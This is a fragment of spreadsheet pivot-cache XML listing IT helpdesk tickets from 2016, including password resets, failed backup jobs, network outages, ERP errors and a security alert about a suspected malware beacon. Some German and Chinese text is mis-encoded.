    <x v="24"/>
  </r>
  <r>
    <s v="install company barcode fÃ¼r ewew8323506 \vzqomdgt jwoqbuml"/>
    <s v="install company barcode fÃ¼r ewew8323506 \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="job Job_1348 failed in job_scheduler at: 09/09/2016 04:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1348 failed in job_scheduler at: 09/09/2016 04:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="ç­”å¤: shipments iak"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wqzarvhx.hfsojckw@gmail.com_x000d__x000a__x000d__x000a_hi,all_x000d__x000a_i move shipping date to 10th,  dn 9169268127 created, pls help to ship out, "/>
    <s v="wqzarvhx hfsojckw"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job bk_bia_bobje failed in job_scheduler at: 09/09/2016 04:34:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_bia_bobje failed in job_scheduler at: 09/09/2016 04:34:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="security incidents - ( #in33826812 ) : possible malware phone home request - rgtw7402550"/>
    <s v="source ip :83.54.03.93209 _x000a_system name :rgtw8513661_x000a_user  name:workstation/server_x000a_location :usa nvyjtmca xjhpznds/traversecitymi_x000a_sep , sms status :_x000a_field sales user ( yes / no) :  _x000a_dsw event log:_x000a_------------------------------------------------------------------------------------_x000a_=========================_x000a_incident overview_x000a_=========================_x000a_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_x000a__x000a_the outbound http traffic from the infected device contained the following method data:_x000a_protocol: tcp_x000a_http method: post_x000a_http version: http/1.1_x000a_domain: tps10234.doubleverify.com_x000a_url path: /event.jpg_x000a_user-agent: mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/52.0.2743.116 safari/537.36_x000a_content length: 15_x000a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ticket only escalation for related events (medium priority ticket and an e-mail only notification)._x000a_2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal)._x000a__x000a_sincerely,_x000a_ ctoc_x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: [[2 of 2 events not shown due to space constraints]]"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="2"/>
  </r>
  <r>
    <s v="efdl8111235 - need add. software installed on my new latitude e5470 - storch - tel.: -341"/>
    <s v="efdl8111235 - need add. software installed on my new latitude e5470 - storch - tel.: -341_x000d__x000a__x000d__x000a_- archiving_tool viewer_x000d__x000a_- hardcopy_x000d__x000a_- reisekosten"/>
    <s v="fcqxdusv zvkbhayo"/>
    <x v="28"/>
  </r>
  <r>
    <s v="arbeitsplatz: pc+telefon in germany im bÃ¼ro kÃ¼ffner/wÃ¶lfel einrichten"/>
    <s v="auf grund das ich ab jetzt einen tag in der woche in germany bin um die azubis die in germany  stationiert sind zu betreuen benÃ¶tige ich einen arbeitsplatz in germany."/>
    <s v="wyotidgu nydzrtuw"/>
    <x v="32"/>
  </r>
  <r>
    <s v="access to below applications"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kxmidsga.zokivdfa@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_please provide the access to below applications._x000d__x000a__x000d__x000a_1.       company engineering tool._x000d__x000a__x000d__x000a_2.       business_client_x000d__x000a__x000d__x000a_"/>
    <s v="kxmidsga zokivdfa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to add lxkecjgr fwknxupq to shared mailbox"/>
    <s v="need to add lxkecjgr fwknxupq to shared mailbox"/>
    <s v="lckagtry xcrmzgli"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp transaktion pr05 funktioniert nicht"/>
    <s v="_x000a__x000a_received from: ida.financial@company.com_x000a__x000a_hallo,_x000a__x000a_die erp transaktion pr05 zeigt folgende fehlermeldung:_x000a__x000a__x000a_[cid:image001.png@01d20a74.bee4de80]_x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_ida financial_x000a_quality technician_x000a__x000a_email: ida.financial@company.com&lt;mailto:ida.financial@company.com&gt;_x000a__x000a__x000a_geschÃ¤ftsfÃ¼hrer/managing directors: phvkowml azbtkqwx, naruedlk mpvhakdq_x000a__x000a_"/>
    <s v="xfznctqa xstndbwa"/>
    <x v="9"/>
  </r>
  <r>
    <s v="erp SID_34 account password is locked"/>
    <s v="_x000a__x000a_received from: fwkxbley.stndeick@gmail.com_x000a__x000a_hi:_x000a_users:  sonhygg_x000a__x000a_erp SID_34 account password is locked, unlock help,"/>
    <s v="fwkxbley stndeick"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33826812 ) : possible malware phone home request - rgtw7402550"/>
    <s v="source ip :83.54.03.93209 _x000a_system name :rgtw8513661_x000a_user  name:workstation/server_x000a_location :usa nvyjtmca xjhpznds/traversecitymi_x000a_sep , sms status :_x000a_field sales user ( yes / no) :  _x000a_dsw event log:_x000a_------------------------------------------------------------------------------------_x000a_=========================_x000a_incident overview_x000a_=========================_x000a_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_x000a__x000a_the outbound http traffic from the infected device contained the following method data:_x000a_protocol: tcp_x000a_http method: post_x000a_http version: http/1.1_x000a_domain: tps10234.doubleverify.com_x000a_url path: /event.jpg_x000a_user-agent: mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/52.0.2743.116 safari/537.36_x000a_content length: 15_x000a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ticket only escalation for related events (medium priority ticket and an e-mail only notification)._x000a_2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal)._x000a__x000a_sincerely,_x000a_ ctoc_x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: [[2 of 2 events not shown due to space constraints]]"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="wifi guest account"/>
    <s v="_x000a__x000a_received from: scjxobhd.ldypjkmf@gmail.com_x000a__x000a_hello help team,_x000a__x000a_a meeting is scheduled at fÃ¼rth on september 14 &amp; 15._x000a_can you pls. arrange wifi guest accounts for the two external trainers for both days:_x000a__x000a_names:_x000a__x000a__x000a_1.       utthku tehrsytu_x000a_email: utthku.tehrsytu@de.bosch.com&lt;mailto:utthku.tehrsytu@de.bosch.com&gt;_x000a__x000a_2.       uwe tryhutehdtui_x000a_email: uwe.tryhutehdtui@de.bosch.com&lt;mailto:uwe.tryhutehdtui@de.bosch.com&gt;_x000a__x000a_"/>
    <s v="scjxobhd ldypjkmf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock exchange active sync for ios for vmthcrkf iceyusnd (pipfhypeu) : company device."/>
    <s v="_x000d__x000a__x000d__x000a_received from: xvwchsdg.pladjmxt@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a__x000d__x000a_is it possible to have exchange active sync for ios unlocked in advance prior to getting the normal email which shall be forwarded??_x000d__x000a__x000d__x000a_vmthcrkf iceyusnd will be receiving his iphone today and it would be good if he can use it immediately._x000d__x000a__x000d__x000a_best "/>
    <s v="xvwchsdg pladjmxt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer problem / issue information"/>
    <s v="bei mp60 funktioniert das fax nicht mehr."/>
    <s v="gasbfqvp fmvqgjih"/>
    <x v="32"/>
  </r>
  <r>
    <s v="ordner mbs"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pnroqajb.psbyfhkg@gmail.com_x000d__x000a__x000d__x000a_hallo helpteam,_x000d__x000a__x000d__x000a_im departmentlaufwerk von germany steel ist im ordner ehs der unterordner mbs verschwunden. bitte wieder herstellen._x000d__x000a__x000d__x000a_vielen dank!_x000d__x000a__x000d__x000a_viele grÃ¼ÃŸe / best "/>
    <s v="pnroqajb psbyfhkg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook search not working."/>
    <s v="well i have an issue with search tool of my outlook_x000d__x000a_whenever i m connected to net, it works but when m working offline, it does nt wrk at all"/>
    <s v="ftgvlneh aitsgqwo"/>
    <x v="26"/>
  </r>
  <r>
    <s v="please help enable the o365 video service"/>
    <s v="die angehÃ¤ngten video die ich per e-mail Ã¼ber office 365 bekommen lassen sich nicht Ã¶ffnen!!_x000d__x000a__x000d__x000a_die videos von  &quot;letÂ´s talk&quot; kann ich nicht ansehen."/>
    <s v="ymoeqrsx rbctdsyi"/>
    <x v="15"/>
  </r>
  <r>
    <s v="ie browser issue "/>
    <s v="ie browser issue "/>
    <s v="jborwynt gidxbfrq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool :company issue "/>
    <s v="engineering_tool :company issue : forbidden error"/>
    <s v="cugjzqlf djwbyact"/>
    <x v="0"/>
  </r>
  <r>
    <s v="attendance_tool login issue"/>
    <s v="_x000a_summary:problem with attendance_tool"/>
    <s v="jchlkard tcaiyjfg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login problem with attendance_tool portal"/>
    <s v="_x000a__x000a_received from: jchlkard.tcaiyjfg@gmail.com_x000a__x000a_dear sir,_x000a__x000a_im facing a problem to login in attendance_tool portal._x000a__x000a_please help to solve the issue._x000a__x000a_"/>
    <s v="jchlkard tcaiyjfg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: united kingdom(company): united kingdom-company-dmvpn-1811-rtr02 went down at 11:03 pm et on 09/08. backup is up"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______11:03 pm et on 09/08. ________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___no____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ______    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   __yes______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na__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na_____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bkwin_search_server_dev_daily failed in job_scheduler at: 09/08/2016 23:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_backup statistics:_x000d__x000a_          _x000d__x000a_  session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........         10          _x000d__x000a_  failed disk agents ...........          0          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........         10          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          1          _x000d__x000a_  failed media agents ..........          1          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          2          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................   58614 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          0    _x000d__x000a__x000d__x000a_===============================================================_x000d__x000a_job bkwin_search_server_dev_daily failed in job_scheduler at: 09/08/2016 23:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="copy window 7 at monitor"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ujbaemlc.ilzhrxjo@gmail.com_x000d__x000a__x000d__x000a_hi team_x000d__x000a__x000d__x000a_please fix problem copy window 7 at monitor, "/>
    <s v="ujbaemlc ilzhrxjo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_38hotf failed in job_scheduler at: 09/08/2016 22:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_[major] from: bma@HostName_1302.hq.company.com &quot;lib6_drive1&quot;  time: 9/8/2016 10:01:54 pm_x000d__x000a_[90:51]   /dev/rmt36.1_x000d__x000a_ cannot write to device ([5] i/o error)_x000d__x000a__x000d__x000a__x000d__x000a_backup statistics:_x000d__x000a_          _x000d__x000a_  session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........         14          _x000d__x000a_  failed disk agents ...........          1          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........         15          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          0          _x000d__x000a_  failed media agents ..........          2          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          2          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................  378146 mb        _x000d__x000a_  used media total .............          2          _x000d__x000a_  disk agent errors total ......          1    _x000d__x000a__x000d__x000a_===============================================================_x000d__x000a_= exit status           : 11_x000d__x000a_= system time (seconds) : 0     elapsed time (minutes) : 82_x000d__x000a_= user time (seconds)   : 0_x000d__x000a_= thu 09/08/16 22:05:23 eastern daylight time_x000d__x000a_===============================================================_x000d__x000a__x000d__x000a_job SID_38hotf failed in job_scheduler at: 09/08/2016 22:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="outlook æ‰“å¼€å¯åŠ¨æç¤ºé”™è¯¯ã€‚"/>
    <s v="outlook æ‰“å¼€å¯åŠ¨æç¤ºé”™è¯¯ã€‚"/>
    <s v="mpjoszqg wurpohmf"/>
    <x v="31"/>
  </r>
  <r>
    <s v="job Job_2555 failed in job_scheduler at: 09/08/2016 22:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2555 failed in job_scheduler at: 09/08/2016 22:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="india , company-ap-ind--pu5-lean-2960s-stack-sw01 went down on 9/8/2016 7:59 pm"/>
    <s v="india , company-ap-ind-kirty-pu5-lean-2960s-stack-sw01 went down on 9/8/2016 7:59 pm_x000a_gigabitethernet1/0/52 Â· uplink to company-ap-ind--pu5-lean-2960s-stack-sw01 on company-ap-ind-pu5-gf-2960s-access-sw01.company.com is down"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="è½¬å‘: finished: start of s&amp;op process"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lkrfndev.kztlojin@gmail.com_x000d__x000a__x000d__x000a_helloï¼Œit help_x000d__x000a__x000d__x000a_since our territory sales director has been resigned ,i need response for reviewing forecast in futureï¼Œcan you please help assign this approval authorizationï¼ˆs&amp;opï¼‰ï¼Œ"/>
    <s v="lkrfndev kztlojin"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i have a erp issue. reversed dn 9168001220 for sales order 35934132 when i went to valn2 to complete delivery. i get thi"/>
    <s v="name:maghyuigie ghjkzalez_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:houcdelq.wnypackq@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:hi it team_x000a_i have a erp issue. reversed dn 9168001220 for sales order 35934132 when i went to valn2 to complete delivery. i get this message value of modific. counter for doc 1146045243 in supply_chain is 0, but should be 5 please help."/>
    <s v="houcdelq wnypackq"/>
    <x v="5"/>
  </r>
  <r>
    <s v="skype audio not working"/>
    <s v="skype audio not working._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-updated the audio drivers after checking the sound settings._x000d__x000a_-restarted the pc._x000d__x000a_-audio is now working fine._x000d__x000a_-issue resolved._x000d__x000a_"/>
    <s v="eqxakzyi cwfrjitq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_562 failed in job_scheduler at: 09/08/2016 17:53:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_562 failed in job_scheduler at: 09/08/2016 17:53:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_39hotf failed in job_scheduler at: 09/08/2016 17:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_39hotf failed in job_scheduler at: 09/08/2016 17:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="netzwerkkabel des erp druckers verlÃ¤ngern,"/>
    <s v="netzwerkkabel des erp druckers em 19 verlÃ¤ngern (bÃ¼ro heiner sponsel)"/>
    <s v="tfrbwoua aegpkruc"/>
    <x v="41"/>
  </r>
  <r>
    <s v="need to add the pc lvlw8517820 to domain "/>
    <s v="need to add the pc lvlw8517820 to domain "/>
    <s v="pmqansex nvihmbwc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp netweaver business client will not open drawings."/>
    <s v="name:xyjkndus ltcevgap_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xyjkndus.ltcevgap@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:erp netweaver business client will not open drawings."/>
    <s v="xyjkndus ltcevgap"/>
    <x v="10"/>
  </r>
  <r>
    <s v="what is the easiest way to change all of my passwords?"/>
    <s v="name:slrgconp onukdesq_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:slrgconp.onukdesq@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:what is the easiest way to change all of my passwords?"/>
    <s v="slrgconp onukdesq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for ticket_no0438583"/>
    <s v="ticket update for ticket_no0438583"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to engineering tool"/>
    <s v="unable to log in to engineering tool"/>
    <s v="kpuqlzwh lbpiyquf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user name for fabxjimdghtyo depfugcy "/>
    <s v="user name for fabxjimdghtyo depfugcy "/>
    <s v="lkwspqce knxaipyj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2: printer hr14  not printing pdf document."/>
    <s v="printer hr14  not printing pdf document._x000a_-connected to the user system using teamviewer _x000a_-deleted the printer and readded the printer , able to print word docs,not able to print pdf docs._x000a_-user has been having this issue again._x000a_-user needs a local it take a look aerp._x000a_computer name: lhol8516104_x000a_-contact: "/>
    <s v="usqrpicf dfmxaliz"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="name:mfeyouli ndobtzpw_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mfeyouli.ndobtzpw@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:please reset windows password and erp password for laffekr"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vendor needs to save files to his local pc."/>
    <s v="hi,_x000d__x000a__x000d__x000a_please reference inc1548324.  i have another vendor - vvnookr - involved in the usa carve-out project that needs to save files to his local pc. can you add vvnookr to the exceptions group?  nicrhty edmhihryu will approve if necessary.  _x000d__x000a__x000d__x000a_"/>
    <s v="drmusvny yvsmtgid"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp runtime error.....this is what i'm eventually seeing"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jbfmsxik.mfzjncva@gmail.com_x000d__x000a__x000d__x000a_good afternoon:_x000d__x000a__x000d__x000a_i'm having some difficulty looking up some top notch drawingsâ€¦i keep getting this &quot;time out&quot; error screen come up.  i'm looking these drawings up under the cv04n page.  i was directed to do the following to see these top notch drawings.  i'm not sure if it's a permissions problem or an erp problem.  any way you all could shed some light on this??_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image002.png@01d209e4.3e33a090]_x000d__x000a__x000d__x000a_here's what i get when i try to look up those drawingsâ€¦.._x000d__x000a__x000d__x000a_[cid:image001.png@01d209b7.ee5552c0]_x000d__x000a__x000d__x000a_"/>
    <s v="jbfmsxik mfzjncva"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for inplant_858584"/>
    <s v="ticket update for inplant_858584"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="pnacqfso ojwkmzcb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="snagit"/>
    <s v="_x000a__x000a_received from: lucgnhda.carthy@company.com_x000a__x000a_does company have a corporate license for snagit editor 12?_x000a__x000a_--_x000a_qmglkaru qiwhfkdv_x000a_manager business systems,_x000a_lucgnhda.carthy@company.com_x000a__x000a_crm news!_x000a_it's here! with the final release of the fy16 dynamics crm project, the microsoft dynamics crm mobile app is now available for download for all crm users. the app can be installed on any ios, android or windows phone or tablet, including the dell 2-in-1 windows 8.1 tablet/laptop._x000a_for more details on the app, watch the launch video&lt;_x000a__x000a_need help with your dynamics crm?_x000a_click here&lt;_x000a__x000a_chat with a live agent about your dynamics crm now! click here&lt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="qmglkaru qiwhfkdv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook"/>
    <s v="name:oikhfqyl gcknzthb_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:oikhfqyl.gcknzthb@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:cannot get onto outlook.  just get the blue screen with the dots moving at the bottom.  tried cold boot thrgxqsuojr xwbesorfs."/>
    <s v="oikhfqyl gcknzthb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user harrfgyibs locked out of erp mii system."/>
    <s v="user harrfgyibs locked out of erp mii system._x000a_help the user login after unlocking the user account._x000a_-issue resolved."/>
    <s v="epivntxc fdrxmuga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1388 failed in job_scheduler at: 09/08/2016 13:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1388 failed in job_scheduler at: 09/08/2016 13:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="telecom_vendor_3  dongle"/>
    <s v="help to configure the  dongle on new laptop."/>
    <s v="yzbqwpat fdjrctbu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="id04 printer"/>
    <s v="printer setup"/>
    <s v="rxoluzhy pnutohms"/>
    <x v="18"/>
  </r>
  <r>
    <s v="id 08 printer issue"/>
    <s v="id08 printer not working"/>
    <s v="yszdlwph kwvtrjxm"/>
    <x v="18"/>
  </r>
  <r>
    <s v="user wants this messgage recall aerp.-urgent"/>
    <s v="user wants this messgage recall aerp.-urgent_x000a_"/>
    <s v="fgsmwvcp uoxkzwes"/>
    <x v="26"/>
  </r>
  <r>
    <s v="erp response time is very long - even for simple transactions - please check - plant vSID_62 is reporting."/>
    <s v="erp response time is very long - even for simple transactions - please check - plant vSID_62 is reporting."/>
    <s v="kmtpzyre mqlsfkre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: apac company secondary vpn circuit is down since 12:34 pm on 09/08 et site is up on primary mpls"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __yes__(slo)_     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______12:34 pm on 09/08 et ________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___na____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _____na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na_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _______na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na____________________       _x000d__x000a__x000d__x000a_12. notified  gsc  __na______     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0434290"/>
    <s v="ticket update on ticket_no0434290"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook constantly freezes up."/>
    <s v="contact me @ xt 154712 if needed.  no error messages."/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to update password on password_management_tool"/>
    <s v="unable to update password on password_management_tool"/>
    <s v="zfdkqgmt zvqxcodk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mapping network drive"/>
    <s v="mapping network drive"/>
    <s v="jvxtfhkg heptuizn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cad pc for main training room"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gdkiehbr.kdithjsr@gmail.com_x000d__x000a__x000d__x000a_please configure and install a cad machine under the av cabinet in the new training room. the machine needs the standard cad configuration. please also install a wireless mouse, keybankrd, and 3d cad manipulator._x000d__x000a_the machine will need to be setup for multiple users to sign on with their credentials. per the request of ehs it will also need a dvd drive to play safety training videos._x000d__x000a_"/>
    <s v="gdkiehbr kdithjsr"/>
    <x v="2"/>
  </r>
  <r>
    <s v="sent from snipping tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tfesaxip.cvorpnth@gmail.com_x000d__x000a__x000d__x000a_unable to convert a planned order for this item. also unable to create a production order for this item. received this error message both times._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="tfesaxip cvorpnth"/>
    <x v="44"/>
  </r>
  <r>
    <s v="drive2 is not responding to mount requests for library-5, "/>
    <s v="drive2 is not responding to mount requests for library-5, "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="cannot log into skype"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lijrvdgh.wfhmdsoa@gmail.com_x000d__x000a__x000d__x000a_i cannot log into skype.  it is saying my credentials are bad._x000d__x000a__x000d__x000a_"/>
    <s v="lijrvdgh wfhmdsoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vm lhqsm68267 taking excessive length of time to release backup snapshot."/>
    <s v="the backup_tool backup for lhqsm68267 is taking over 14 hours to release the snapshot at the end of the backup.  can you look at this vm and advise if there is a problem with lhqsm68267."/>
    <s v="txinpadm dluxikjn"/>
    <x v="11"/>
  </r>
  <r>
    <s v="ticket update on inc1549550 "/>
    <s v="ticket update on inc1549550 "/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for erp SID_34 account"/>
    <s v="password reset for erp SID_34 account"/>
    <s v="ovxwqybe gevzkrlp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="quantum oracle database connection is not working"/>
    <s v="HostName_1317 and HostName_1316 databases listener is not functioning when ever we try to uacyltoe hxgaycze the connection it doesn't connect this is affection production.  production is not down this is just making the users enter data manually.  the databases are &quot;quantum&quot; and &quot;glog2&quot;_x000d__x000a__x000d__x000a_ip addresses:_x000d__x000a_HostName_1317 10.170.140.10_x000d__x000a_proglovia  10.170.140.30_x000d__x000a__x000d__x000a_here is the ip address for the cisco ucs manager console 89.96.26.1800_x000d__x000a_i've tried every set of credentials that i have access.  did anyone change the credentials_x000d__x000a__x000d__x000a_HostName_1316 and HostName_1317 have been restarted as requested.  please check the database listener for databaseslisted below_x000d__x000a__x000d__x000a_quantum_x000d__x000a_glog2_x000d__x000a_glog2old"/>
    <s v="pvlxjizg xzvlwqjc"/>
    <x v="1"/>
  </r>
  <r>
    <s v="german call"/>
    <s v="german call"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="alfqhigv zofjibkr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can't create a delivery note for a sto # 5019104863 from plant_120 to plant_348"/>
    <s v="we can't create a delivery note for a sto # 5019104863 from plant_120 to plant_348 for all 4 items._x000d__x000a_all items in that sto are available in stock in plant_120, but the system does not see it._x000d__x000a_please check and generate a delivery note._x000d__x000a_it is quite urgent as the drum #7262112 needs to be sent further to apac for the exposition in apac._x000d__x000a_"/>
    <s v="repyzajo lxfwopyq"/>
    <x v="5"/>
  </r>
  <r>
    <s v="vpn access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: khspqlnj.npgxuzeq@gmail.com_x000d__x000a__x000d__x000a_i am unable to access some network folders when connected to vpn_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ajdcnwtb bvijwxko"/>
    <x v="0"/>
  </r>
  <r>
    <s v="node germany pbx trunk card located at germany is down at 9:33 pm et on 09/08."/>
    <s v="node germany pbx trunk card located at germany is down at 9:33 pm et on 09/08."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="36"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="password reset "/>
    <s v="ajlbguzn fxrwivyg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to znqcljxt azvoespk's collaboration_platform"/>
    <s v="contact : "/>
    <s v="csotmdiw yfeqcbti"/>
    <x v="15"/>
  </r>
  <r>
    <s v="npc 311104334 - &quot;plant not selected&quot;"/>
    <s v="i was notified by kuznvase jrxtbuqz that this npc is having an issue. apparently, the plant was not selected during the execution of the task. please investigate and talk to thilo for my specifics. "/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="10"/>
  </r>
  <r>
    <s v="my SID_39 crm has problem-please help to fix it aerp, thanks!"/>
